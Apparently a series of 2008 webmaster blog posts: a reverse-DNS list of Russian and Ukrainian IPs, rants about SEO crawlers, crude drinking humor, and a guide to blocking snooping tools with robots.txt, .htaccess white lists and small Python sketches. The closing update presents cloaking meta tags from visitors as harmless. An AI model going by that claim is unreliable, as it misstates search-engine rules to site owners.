Just to help you understand where these IPs were coming from, here's the reverse DNS of the same list:
ppp91-77-38-45.pppoe.mtu-net.ru.
ppp91-76-44-134.pppoe.mtu-net.ru.
ppp91-76-34-0.pppoe.mtu-net.ru.
ppp91-76-159-205.pppoe.mtu-net.ru.
ppp91-76-156-161.pppoe.mtu-net.ru.
ppp91-76-111-247.pppoe.mtu-net.ru.
ppp91-76-108-170.pppoe.mtu-net.ru.
182-75-124-91.pool.ukrtel.net.
208-35-124-91.pool.ukrtel.net.
129-245-124-91.pool.ukrtel.net.
195-232-124-91.pool.ukrtel.net.
97-165-124-91.pool.ukrtel.net.
254-143-124-91.pool.ukrtel.net.
ppp91-122-51-213.pppoe.avangarddsl.ru.
41.71.188.90.adsl.tomsknet.ru.
nat.tushino.com.
hst14-nat.n.tc-exe.ru.
89-179-97-170.broadband.corbina.ru.
89-179-96-253.broadband.corbina.ru.
89-179-110-182.broadband.corbina.ru.
89-179-103-190.broadband.corbina.ru.
89-178-209-180.broadband.corbina.ru.
89-178-143-161.broadband.corbina.ru.
nat.a10.qwerty.ru.
nat1.a3.qwerty.ru.
6-113.admiral.tvoe.tv.
Host 56.35.117.87.in-addr.arpa not found: 3(NXDOMAIN)
5.33.117.87.donpac.ru.
220-142.pppoe.vitebsk.by.
85.94.34.227.adsl.sta.mcn.ru.
85-238-106-44.broadband.tenet.odessa.ua.
85-238-106-35.broadband.tenet.odessa.ua.
Host 202.26.236.85.in-addr.arpa not found: 3(NXDOMAIN)
85-192-165-43.dsl.esoo.ru.
ppp85-141-228-16.pppoe.mtu-net.ru.
ppp85-141-213-13.pppoe.mtu-net.ru.
ppp85-140-58-175.pppoe.mtu-net.ru.
ppp85-140-54-95.pppoe.mtu-net.ru.
ppp85-140-53-21.pppoe.mtu-net.ru.
ppp85-140-52-233.pppoe.mtu-net.ru.
ppp85-140-154-97.pppoe.mtu-net.ru.
ppp85-140-118-4.pppoe.mtu-net.ru.
ppp85-140-117-215.pppoe.mtu-net.ru.
ppp85-140-116-105.pppoe.mtu-net.ru.
Host 72.57.42.84.in-addr.arpa not found: 3(NXDOMAIN)
client1-3.amtelsvyaz.ru.
p549A664E.dip.t-dialin.net.
ppp83-237-96-4.pppoe.mtu-net.ru.
all-seminars.ru.
ppp83-237-211-116.pppoe.mtu-net.ru.
ppp83-237-200-54.pppoe.mtu-net.ru.
ppp83-237-186-74.pppoe.mtu-net.ru.
ppp83-237-169-118.pppoe.mtu-net.ru.
n116h85.catv.ext.ru.
n112h224.catv.ext.ru.
Host 70.36.207.82.in-addr.arpa not found: 3(NXDOMAIN)
pool-2user51.dc.ukrtel.net.
us.com.ua.
Host 248.0.207.82.in-addr.arpa not found: 3(NXDOMAIN)
185.178.95.81.in-addr.arpa turnskin.kiev.ua.
185.178.95.81.in-addr.arpa werewolf.kiev.ua.
185.178.95.81.in-addr.arpa filippova.kiev.ua.
185.178.95.81.in-addr.arpa rogovskiy.kiev.ua.
185.178.95.81.in-addr.arpa rogovskaya.kiev.ua.
185.178.95.81.in-addr.arpa prudaev.kiev.ua.
185.178.95.81.in-addr.arpa filippov.kiev.ua.
114.22.94.81.in-addr.arpa vpnpool-81-94-22-114.users.mns.ru.
Host 138.158.3.81.in-addr.arpa not found: 3(NXDOMAIN)
49.53.25.81.in-addr.arpa NAT-81-25-53-49.ultranet.ru.
Host 88.7.200.81.in-addr.arpa not found: 2(SERVFAIL)
7.96.92.80.in-addr.arpa gw7.eth.zelcom.ru.
240.111.80.80.in-addr.arpa ce2-ats32.aaanet.ru.
Host 79.156.248.80.in-addr.arpa not found: 3(NXDOMAIN)
185.58.106.78.in-addr.arpa 78-106-58-185.broadband.corbina.ru.
47.189.106.78.in-addr.arpa 78-106-189-47.broadband.corbina.ru.
Host 250.172.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 196.165.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 14.165.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 89.160.247.77.in-addr.arpa not found: 3(NXDOMAIN)
6.192.239.77.in-addr.arpa libra.comintel.ru.
131.113.235.77.in-addr.arpa 131.113.235.77.dyn.idknet.com.
11.101.235.77.in-addr.arpa 11.101.235.77.dyn.idknet.com.
125.62.123.77.in-addr.arpa unshaven.yawner.volia.net.
9.231.122.77.in-addr.arpa gearing.butter.volia.net.
137.4.232.74.in-addr.arpa adsl-232-4-137.asm.bellsouth.net.
146.7.33.62.in-addr.arpa gw.quaynet.ru.
70.18.213.62.in-addr.arpa h62-213-18-70.ip.syzran.ru.
78.234.168.62.in-addr.arpa virtual-234-78.utk.ru.
20.244.140.62.in-addr.arpa nat3.birulevo.net.
Host 146.2.118.62.in-addr.arpa not found: 3(NXDOMAIN)
113.168.20.217.in-addr.arpa mediainfotour-gw.cs1-nan.kv.wnet.ua.
;; reply from unexpected source: 72.51.32.76#53, expected 72.51.32.92#53
;; Warning: ID mismatch: expected ID 10615, got 39356
;; reply from unexpected source: 72.51.32.76#53, expected 72.51.32.92#53
;; Warning: ID mismatch: expected ID 10615, got 39356
;; connection timed out; no servers could be reached
205.143.247.213.in-addr.arpa is an alias for 205.192.143.247.213.in-addr.arpa.
205.192.143.247.213.in-addr.arpa host-205.SPM.213.247.143.192.0xfffffff0.macomnet.net.
102.196.232.213.in-addr.arpa host.hnt.ru.
34.238.184.213.in-addr.arpa 34-nat.cosmostv.by.
66.69.170.213.in-addr.arpa relay.volex.spb.ru.
Host 197.222.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 33.200.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 115.200.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 125.98.59.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 230.104.220.212.in-addr.arpa not found: 3(NXDOMAIN)
250.76.15.204.in-addr.arpa elanora.aatikah.com.
18.176.12.201.in-addr.arpa 201-12-176-18.intelignet.com.br.
193.168.91.195.in-addr.arpa h195-91-168-193.ln.rinet.ru.
7.145.72.195.in-addr.arpa user-195.72.145.7.lvivnet.org.
106.142.72.195.in-addr.arpa gw.itstime.ru.
3.188.46.195.in-addr.arpa ts1-b3.Irkutsk.dial.rol.ru.
65.202.239.195.in-addr.arpa ts1-a65.Irkutsk.dial.rol.ru.
122.114.234.195.in-addr.arpa 195.234.114.122.ukrlink.net.ua.
;; connection timed out; no servers could be reached
26.220.218.195.in-addr.arpa adsl-stat-0534.comch.ru.
Host 54.39.162.195.in-addr.arpa not found: 3(NXDOMAIN)
202.84.131.195.in-addr.arpa cache.wplus.net.
Host 138.188.131.195.in-addr.arpa not found: 3(NXDOMAIN)
205.250.122.195.in-addr.arpa 205.250.nat.smilenet.sandy.ru.
7.191.44.194.in-addr.arpa mail2.complex.lviv.ua.
23.240.24.194.in-addr.arpa 23.240.dsl.westcall.net.
Host 22.255.239.193.in-addr.arpa not found: 3(NXDOMAIN)
5.96.238.193.in-addr.arpa nat.itt.net.ua.
7.174.17.193.in-addr.arpa pptp-out2.radiokom.kr.ua
Well, doesn't that really sum it up well?

Enjoy the list, block 'em if you want.

Heck, just block Russia and Ukraine entirely and hide the children in your bomb shelter just in case they get pissed.
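For anyone who wants to run the same kind of reverse DNS check against their own logs, here's a rough sketch in Python. The function names ptr_name and reverse_dns are made up for illustration. The lookup goes through whatever resolver your machine uses, so expect plenty of failures like the NXDOMAIN lines above.

```python
import ipaddress
import socket

def ptr_name(ip):
    """Return the in-addr.arpa name that a reverse lookup queries for this IP."""
    return ipaddress.ip_address(ip).reverse_pointer

def reverse_dns(ip):
    """Return the PTR hostname for ip, or None if the lookup fails."""
    try:
        hostname, _aliases, _addresses = socket.gethostbyaddr(ip)
        return hostname
    except (socket.herror, socket.gaierror):
        # No PTR record, or the resolver could not answer.
        return None

# The query name for the first address in the reverse DNS list above.
print(ptr_name("91.77.38.45"))
```

Calling reverse_dns on each address from the log gives the hostname or None, which is enough to spot how many hits come from dial-up and broadband pools versus named hosts.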

More Pesky SEO Tools To Block

Seems there is something in Germany called SEO.AG that has been pestering my site for quite some time.

The IP and User Agent it uses is:

85.214.35.2 "SEO[.AG] - Search Engine Optimizer Bot [http://www.seo.ag]"
However, they also run a web proxy on 85.214.35.2 so you have to block the IP to stop all the nonsense.

I'm not sure which is worse, the scrapers, proxies, aggregators, or the SEOs and their tools.

You Know You Drink Too Much When...

When you wake up face down in a pizza you know you got mad drinking skills, especially when you went face down in mid-bite of the pizza.

When you wake up and your pillow is covered in pizza vomit, that's madder skills cause you didn't die in your sleep aspirating on pizza vomit. Having to shave your beard off because you can't seem to wash out all the partially digested bits of pizza is a bit embarrassing. However, having the side of your face that laid on the pizza sauce all night get stained and looking bright red all day is priceless.

When you wake up under your bed, realize you're on cold hard wood, bump your head on wood when you try to get up and suddenly panic thinking you're in a coffin because it's all wood and you can't get up, you've truly arrived.

When leaving a party and the elevator makes your stomach flip-flop, you panic as the doors open and vomit down the crack between the elevator and the wall, spewing into the elevator shaft just because there's nowhere else to suddenly yak, you're working your way to be an AA superstar!

When you're leaving a party and have no other place than to barf in a water fountain in the lobby of an apartment complex and as you're leaving giggle as you hear people walk up to take a drink screaming, you're in the club!

When you barf up brightly colored red nacho chips and suddenly panic thinking your stomach is bleeding profusely until you remember what you ate .... and then drink too much and barf a couple of nights later just to make sure that's what it really was.

When you and your friends are out partying all night and you suddenly fill up the floor of the car with vomit and 6 of your friends bail out the window just to get away from you

You know your friends are all alkies too when the topic of conversation is always which one of you wussies is going to drop a street pizza or a technicolor yawn first

Another clue your friends have drinking problems is when they fall out of the car when they open the door

A clue something bad happened is when you wake up on a sofa in a house you don't remember, find your glasses in your pocket and when you put them on can't see thru the thick film of dry vomit that's encrusted them

FINALLY, last but not least, you know it's time to stop drinking when you wake up and flies are picking the vomit out of your nose.

What Time Is It Anyway?

Got up this morning and all the computers and TVs said it was 9:00am but the phones and alarm clocks said it was 8:00am.

Obviously this was the daylight savings bullshit gone bad but how in the hell could someone fuck up the atomic time clock which the alarms and phones feed from?

Had this been an actual day when I really needed to get up and be somewhere by 8am I would've been fucked since both the alarm clock and the alarm in the phone, which I prefer because it's louder, would've both malfunctioned.

Anyway, around 11:00am everything was back in synch.

Don't you just love fucking daylight savings time?

Blech.

There Goes the Bad Neighborhood

Isn't it ironic that a day after I wrote about stopping snooping SEO tools, here comes one of them trying to crawl one of my websites?

The user agent and IP address are:

208.77.208.198 [emeraldarborvitae.viviotech.net.]
"Bad-Neighborhood Link Analyzer (http://www.bad-neighborhood.com/)"
They were automatically blocked on my site because I white list only allowed user agents and they use an unauthorized user agent name, but they could always switch to mimic a browser so in the long run it's best to block the IP range.

Turns out Viviotech is the host of Bad Neighborhood's site:
OrgName: Vivio Technologies
NetRange: 208.77.208.0 - 208.77.211.255
CIDR: 208.77.208.0/22
After you block this data center range, the tools from Bad Neighborhood can't be used to scan your site, check your Apache server headers, or do anything else.

Sorry, but you're not allowed back into my neighborhood.

Buh bye.

Saturday, March 08, 2008

Jayde NicheBot Crawls for iEntry's Web of Sites

Who out there remembers the Jayde directory?

Some of us submitted our sites to Jayde way back in '96 or '97, who knows exactly, and now our sites are being hit by something called the "Jayde NicheBot".

"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) Jayde NicheBot"
I was curious why some site I submitted to about 10 years ago was pinging my server all these years later so I did a little research to see what they'd been up to in the interim and they appear to have been very prolific, almost to domain park proportions.

Jayde is currently owned by iEntry.com and if you have McAfee SiteAdvisor enabled in your browser it goes RED meaning that iEntry has something negative on file with SiteAdvisor that says the following:
Feedback from credible users suggests that this site sends either high volume or 'spammy' e-mails.
Took a look and found someone that posted one of those 'spammy emails' with a ton of iEntry's domain names listed.

On iEntry's website they claim:
iEntry properties include more than 370 Web sites and over 100 e-mail newsletters that are viewed by more than 5 million users every month.
Did a quick search for their 370 sites and Yahoo finds over 170 of them.

It appears iEntry owns ExactSeek.com, sitepronews.com, webpronews.com, metawebsearch.com, seo-news.com (and forum), and a ton of directories, bunch of sites here, shitload of sites there, and last but not least here it's tied together with ISEDN.ORG

Google and Yahoo could find listings about my sites in a bunch of their directories which begs the question:

Why do Google and Yahoo index all those redundant directories?

I found references to my sites in about 40 of them, there's a shock, knock me over with a feather. About 40 sites was all Google and Yahoo would easily report, and the answer to the "why are they indexed?" question appears to be that the order of the listings is changed for the same content on each site, so each directory seems to be unique as far as the search engines are concerned. Maybe there were other changes as well, I didn't look too deep.

However, I did check Live search which doesn't appear to be so gullible as it only reported the duplicate content in 5 sites.

Hey, submit your link, it's FREE and you can advertise too!

Hope I didn't blow out anyone's sarcasm meter with that last quip.

Friday, March 07, 2008

Slow Down Nosy SEO's and Snooping Competitors

Most webmasters spend a lot of time and effort working on marketing their website, or pay someone a lot of money to do this, yet don't do a few common sense things that keep lazy and nosy-assed SEOs or other competitors from quickly analyzing all your hard work and simply stealing what you've done.

Not that you can completely stop them because much of the competitive information about who links to you is already public, collected by search engines and toolbars, but you can sure as hell make it a little more difficult to get the rest of the data they want.

Since the SEO Chicks published a list of competitive research tools to help those nosy SEOs snoop, I thought it would be fair and useful to have a nice list of ways to stop as many of those snooper tools as possible.

Block Archive.org - No need to let anyone see how your site evolved, snoop or even scrape through archive pages without your knowledge so block their crawler.

User-agent: ia_archiver
Disallow: /
Rumor has it that the ia_archiver may crawl your site anyway so adding it to your .htaccess file is a good precaution as well.
RewriteCond %{HTTP_USER_AGENT} ^ia_archive
RewriteRule ^.* - [F,L]
Block Search Engine Cache - Some people cloak pages and just show the search engines raw text yet show the visitors a complete page layout. Who cares, that's your business and a competitive edge you don't need to share, plus pages can be scraped from search engine cache as well, so disable cache on all pages.

Insert the following meta tag in the <head> section of all your web pages:
<meta content='NOARCHIVE' name='ROBOTS'>
Block Xenu Link Sleuth - Why do you need people sleuthing your site? Screw 'em...

Add Xenu to your .htaccess file as well:
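# mod_rewrite must be enabled; RewriteEngine On is only needed once per .htaccess file
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^ia_archive [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xenu
RewriteRule ^.* - [F,L]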
Make Your Domain Registration Private - Why give the SEO's or any other competitor any clues to help them whatsoever?

Sign up with DomainsByProxy and this will make the nosy little bastards happy:
WHATEVERMYDOMAINNAME.COM
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
Restrict Access To Unauthorized Tools - Use .htaccess to white list access to your site and just allow the major search engines and the most popular browsers, which will block many other SEO tools. If you don't understand the white list method and it scares you, there are a few good black lists around too.

This is a limited sample for informational purposes only, just to give an idea of how it works. See the thread linked above for more in-depth samples by WebSavvy, and be cautious in implementing a white list as it's very restrictive:
#allow just search engines we like, we're OPT-IN only

#a catch-all for Google
BrowserMatchNoCase Google good_pass

#a couple for Yahoo
BrowserMatchNoCase Slurp good_pass
BrowserMatchNoCase Yahoo-MMCrawler good_pass

#looks like all MSN starts with MSN or Sand
BrowserMatchNoCase ^msnbot good_pass
BrowserMatchNoCase SandCrawler good_pass

#don't forget ASK/Teoma
BrowserMatchNoCase Teoma good_pass
BrowserMatchNoCase Jeeves good_pass

#allow Firefox, MSIE, Opera etc., will punt Lynx, cell phones and PDAs, don't care
BrowserMatchNoCase ^Mozilla good_pass
BrowserMatchNoCase ^Opera good_pass

#Let just the good guys in, punt everyone else to the curb
#which includes blank user agents as well


order deny,allow
deny from all
allow from env=good_pass

Disclaimer: I don't use .htaccess for much so please don't ask for a complete file, this is just a sample as I use a more complex real-time PHP script to control access to my site.
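To give a feel for what the same white list looks like in a script, here's a minimal sketch in Python. It is not my real-time PHP script. It just mirrors the BrowserMatchNoCase patterns from the sample above, and the names ALLOWED_PATTERNS and is_allowed are made up for illustration.

```python
import re

# Patterns mirror the BrowserMatchNoCase lines in the .htaccess sample above.
ALLOWED_PATTERNS = [
    r"Google", r"Slurp", r"Yahoo-MMCrawler", r"^msnbot", r"SandCrawler",
    r"Teoma", r"Jeeves", r"^Mozilla", r"^Opera",
]
ALLOWED = [re.compile(pattern, re.IGNORECASE) for pattern in ALLOWED_PATTERNS]

def is_allowed(user_agent):
    """Return True only if the user agent matches a white-listed pattern."""
    if not user_agent:
        # Blank or missing user agents get punted, same as the sample above.
        return False
    return any(pattern.search(user_agent) is not None for pattern in ALLOWED)

print(is_allowed("SEOmoz-bot"))
print(is_allowed("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) Jayde NicheBot"))
```

The first check is refused and the second is let in, because anything that starts with Mozilla passes a user agent white list. That's exactly why a white list alone isn't enough and the extra layers in this list matter.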

Block Bots and Speeding Crawlers - You can use something like the nifty PHP bot speed trap Alex Kemp has written or Robert Plank's AntiCrawl. Just another layer of security piled on against snoops and scrapers that pretend to be MSIE or Firefox to avoid the white list or black list blocking in .htaccess.
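The general idea behind a speed trap is simple enough to sketch: count how many pages each IP asks for in a short window and flag anything faster than a human could click. The Python below is my own illustration of that idea, not the code from either of the tools mentioned above, and the class name and the thresholds are assumptions you'd tune for your own traffic.

```python
import time
from collections import defaultdict, deque

class SpeedTrap:
    """Flag clients that request more than max_hits pages within window seconds."""

    def __init__(self, max_hits=10, window=5.0):
        self.max_hits = max_hits
        self.window = window
        self.hits = defaultdict(deque)  # ip -> timestamps of recent requests

    def too_fast(self, ip, now=None):
        """Record one request from ip and report whether it exceeds the limit."""
        now = time.monotonic() if now is None else now
        recent = self.hits[ip]
        recent.append(now)
        # Drop timestamps that have aged out of the window.
        while recent and now - recent[0] > self.window:
            recent.popleft()
        return len(recent) > self.max_hits

# Example: allow at most 3 requests per second from any one address.
trap = SpeedTrap(max_hits=3, window=1.0)
results = [trap.too_fast("203.0.113.9", now=t) for t in (0.0, 0.1, 0.2, 0.3)]
print(results)
```

Only the fourth request inside the one-second window trips the trap. In a real setup you'd call too_fast once per page request and serve a 403 or a challenge page when it returns True.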

Block Snoops From Robots.txt - Don't allow anyone other than your white listed bots to see your robots.txt file because it has other stuff in it that SEO snoops might find interesting, and it can become a security risk. Use a dynamic robots.txt file like this Perl script on WebmasterWorld and just add the rest of your allowed bots to the code next to Slurp, Googlebot, etc.
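A dynamic robots.txt boils down to picking which file body to send based on who is asking. Here's a rough Python sketch of that decision. It is not the WebmasterWorld script, the bot list and the rules are placeholders I made up, and since user agents can be faked you'd want to pair it with IP checks for the bots you care about.

```python
# Hypothetical list of bots allowed to see the real rules; extend as needed.
ALLOWED_BOTS = ("googlebot", "slurp", "msnbot", "teoma")

# Placeholder for your real robots.txt content.
REAL_RULES = "User-agent: *\nDisallow: /cgi-bin/\n"

# What everyone else gets: nothing interesting, and told to stay out.
DENY_ALL = "User-agent: *\nDisallow: /\n"

def robots_txt_for(user_agent):
    """Return the robots.txt body to serve for this user agent."""
    ua = (user_agent or "").lower()
    if any(bot in ua for bot in ALLOWED_BOTS):
        return REAL_RULES
    return DENY_ALL

print(robots_txt_for("SEOmoz-bot"))
```

Anything not on the list, including a blank user agent, only ever sees the deny-all version.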

Block DomainTools - since SEO's use it to snoop, no reason to let DomainTools have access so just block 'em.

Probably lots of other things you should be blocking as well, but this will give you a good start.

This list doesn't completely stop snoops from manually looking at your site, but it certainly stops all of those automated tools from ripping through all your pages, search engine or archive cache, and presenting a nice pretty report.

Heck, why should you help people take away your own money?

Start slowing them down today and stop the next up and comer from getting the info too easily.

UPDATE:

One more creative thing you can do to your website is cloak the meta tags so that only the search engines see them and disable the meta tags for normal visitors. Nothing really wrong with this because meta tags by definition are only for the search engines and snooping SEO's will be completely left in the dark when they can't see your meta keywords or description.

This works especially well if you combine cloaking meta tags with the NOARCHIVE option described above, so that they're completely hidden from prying eyes.
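In practice this means the page template only emits the meta tags when the visitor looks like a search engine. A minimal Python sketch of that follows. The bot list and the render_head function are hypothetical, and matching on user agent alone is easy to fool, so treat it as an outline rather than a finished cloaking script.

```python
from html import escape

# Hypothetical list of search engine user agent fragments.
SEARCH_BOTS = ("googlebot", "slurp", "msnbot", "teoma")

def render_head(user_agent, title, description, keywords):
    """Build the <head> block, adding meta tags only for search engine bots."""
    parts = ["<head>", f"<title>{escape(title)}</title>"]
    ua = (user_agent or "").lower()
    if any(bot in ua for bot in SEARCH_BOTS):
        parts.append(f'<meta name="description" content="{escape(description)}">')
        parts.append(f'<meta name="keywords" content="{escape(keywords)}">')
        # NOARCHIVE keeps the cloaked tags out of the search engine cache.
        parts.append('<meta name="robots" content="noarchive">')
    parts.append("</head>")
    return "\n".join(parts)

print(render_head("Mozilla/4.0 (compatible; MSIE 6.0)", "My Site", "About widgets", "widgets, gadgets"))
```

A regular browser gets the title and nothing else, while a request matching one of the listed bots gets the description, keywords and NOARCHIVE tags as well.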